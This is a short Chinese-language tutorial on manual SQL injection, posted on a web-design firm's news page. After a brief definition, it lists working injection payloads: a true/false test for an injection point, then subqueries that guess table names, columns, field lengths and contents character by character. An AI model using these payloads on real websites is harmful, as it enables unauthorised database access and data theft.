微信网站 手机网站建设手机访问 建站咨询 建站咨询 建站咨询 建站咨询
咨询,就免费赠送域名与服务器,咨询热线:13915107752当前位置: > 新闻动态 > 网站设计 >
联系我们
电话咨询:13915107752
电话咨询:0517-89862517
地址: 淮安市清河区金马广场北楼24楼019室

SQL手工注入原理

作者/整理:daijk 浏览次数:次 日期:2018-03-06


一、什么是SQL注入
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
 
二、判定是否存在注入点
and 1=1  and 1=2
 
三、猜解数据库表名
and 0<>(select count(*) from 表名)
 
四、猜解数据库列名
and (select count(列名) from 猜到的表名)>0
 
五、猜解字段长度
and (select top 1 len(猜到的列名) from 猜到的表名)>0
 
六、猜解字符内容
and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')